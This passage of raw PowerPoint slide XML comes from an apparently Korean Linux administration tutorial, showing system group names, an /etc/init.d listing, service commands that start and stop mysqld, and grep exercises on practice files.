                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>root</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>bin</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>daemon</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>sys</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>adm</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>tty</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>disk</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>lp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>mem</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>kmem</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>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/Theory/T2/17</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># service : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>시스템 서비스 조작</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cd /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</a:t>
              </a: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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# ls -al | head</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>652</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>4 06:31 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 10 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>16  2018 ..</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  1897  7</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>22  2011 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>NetworkManager</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  1566  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>23  2012 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>acpid</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  1441  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28  2007 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>anacron</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  1429  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>14  2007 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>apmd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  1284  1</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>27  2010 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>atd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  3328  2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>23  2012 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>auditd</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  1 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  3052  4</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>20  2012 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>autofs</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# service </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> start</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>을</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>를 시작 중</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:                                     [  OK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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# service </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> stop</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>를 정지 중</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:                                         [  OK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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# service </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> restart</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>를 정지 중</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:                                         [  OK  ]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>을</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>를 시작 중</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:                                     [  OK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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# service </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> reload</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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# service </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> status</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>mysqld</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> (</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>pid</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 6843)</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>를 실행 중</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a: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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# service –status-all</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>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/Theory/T2/18</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grep</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특정 문자열 검색 명령어</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en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>init.d</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>]# cd /test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rm *</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`findme1'? y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>일반 빈 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`findme2'? y</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>rm: remove </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>일반 파일 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>`first'? y</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grepme1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grepme2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grepnotme1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grepnotme2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 | grep </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>grepme</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="2E75B6"/>
                </a:solidFill>
              </a:endParaRP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15:10 grepme1</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15:10 grepme2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grepme3</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 | grep </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>grepme</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -c</a:t>
